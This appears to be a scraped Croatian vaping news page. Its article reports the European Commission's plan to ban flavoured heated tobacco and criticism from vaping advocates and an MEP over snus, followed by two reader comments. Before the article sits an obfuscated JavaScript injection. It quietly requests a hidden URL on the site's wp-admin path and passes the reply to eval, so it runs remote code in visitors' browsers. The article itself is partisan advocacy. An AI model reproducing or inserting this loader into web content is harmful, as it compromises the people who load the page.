;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Europska komisija najavljuje planove za zabranu grijanih duhanskih proizvoda

Europska komisija nedavno je objavila plan za zabranu prodaje aromatiziranih grijanih duhanskih proizvoda, a povjerenica za zdravlje i sigurnost hrane, Stella Kyriakides, također poziva na “strožu provedbu” svih novih proizvoda koji ulaze na tržište.

U odgovoru na priopćenje, direktor World Vapers’ Alliance, istaknuo je da je ovo još jedan pogrešan napad na smanjenje štete od duhana. “Šokantno je da se Europska komisija još uvijek bori protiv smanjenja štete od duhana. Potrebno nam je što više opcija kako bismo postigli cilj Komisije od 5% pušenja. Vaping, nikotinske vrećice i grijani duhanski proizvodi, svi oni pomažu ljudima da prestanu pušiti i manje su štetni.”

Landl je dodao da komisija nažalost nastavlja ignorirati znanost u korist vapinga. “Komisija sustavno zanemaruje bogatstvo znanstvenih dokaza koji ukazuju na dobrobiti, a da ne spominjemo iskustva milijuna vapera iz prve ruke. Negativan pristup Komisije smanjenju štete neće učiniti ništa osim potaknuti crno tržište i gurnuti ljude natrag na pušenje.”

“Umjesto da pušačima preporuči da prijeđu na manje štetne alternative, povjerenica Kyriakides odbija poslušati znanost, stručnjake i potrošače. Ovaj plan pokazuje da Europska komisija namjerava dodatno suzbiti smanjenje štete prihvaćajući sve negativne posljedice.”

EK odbacuje sve oblike sigurnijih nikotinskih alternativa

Nažalost, Kyriakides je postala poznata po svom zastarjelom stavu u odnosu na sigurnije nikotinske alternative. Prošlog siječnja, švedska zastupnica u Europskom parlamentu Sara Skyttedal službeno je podnijela zastupnička pitanja u vezi sa snusom europskoj povjerenici (EK) za zdravlje i sigurnost hrane, Stelli Kyriakides. Pitanja su se pojavila uoči objave EU-ovog Plana za borbu protiv raka u veljači, za koji su mnogi stručnjaci tvrdili da izostavlja vrlo ključne strategije za smanjenje štete, kao što je uključivanje sigurnijih alternativa duhanu.

“Činjenica da Komisija ipak ustraje pri stajalištu da snus uzrokuje rak je i iznenađujuća i, da budemo iskreni, prilično izvanredna”, rekao je tada Skyttedal kako ga citira Snusforumet. Snus je vlažni duhanski proizvod u prahu koji se dulje vrijeme stavlja ispod gornje usne. Uglavnom je popularan u Švedskoj, Danskoj i Norveškoj, ali je legalan samo u Švedskoj gdje se smatra učinkovitim proizvodom za smanjenje štete.

Povjerenica EK nastavlja širiti dezinformacije alternativnim duhanskim proizvodima

Kao odgovor na argumente zastupnika u Europskom parlamentu, nažalost, Kyriakides je rekla da stajalište EK ostaje nepromijenjeno jer se snus i drugi oralni duhanski proizvodi povezuju s rakom i drugim štetnim učincima na zdravlje. “Neosporno je da duhan za oralnu uporabu stvara ovisnost i ima negativne zdravstvene učinke, uključujući rak.” Kyriakides je dalje citirala izvješće Znanstvenog odbora EU-a za nove i novootkrivene zdravstvene rizike iz 2008. za koje kaže da je “potvrdilo negativne zdravstvene učinke snusa”.

Povjerenikov odgovor izazvao je oštru reakciju Skyttedala, koji je istaknuo da zapravo većina studija povezanih sa snusom pronalazi malo ili nimalo poveznica s rakom, te je nastavio citirati Lancetov Globalni teret bolesti kao i studiju iz 2020. objavljenu u Scandinavian Journalu of Public Health, oboje zaključuju da nema dokaza koji upućuju na vezu između snusa i raka.

Choose your Reaction!
  • Puna mi je kapa više ovih zatucanih konzervi koje vode EU i većinu država. Kak je netko napisao na FB grupi – kaj ne zabrane cigarete onda ak su frajeri? Oh, wait…

  • Duhan i alkohol pune proračune država. Problem vejpa i njima srodnih je šta u jednom trenutku dolazi do prestanka korištenja ili drastičnog smanjenja šta za rezultat daje manje novaca državama a duhan održava ovisnost pa time i mušeriju za punjenje proračuna… i narkotici su priča za sebe povezana sa sivom i crnom zonom proračuna država. Duhan-alkohol-droga.. zlatni trokut.

Leave a Comment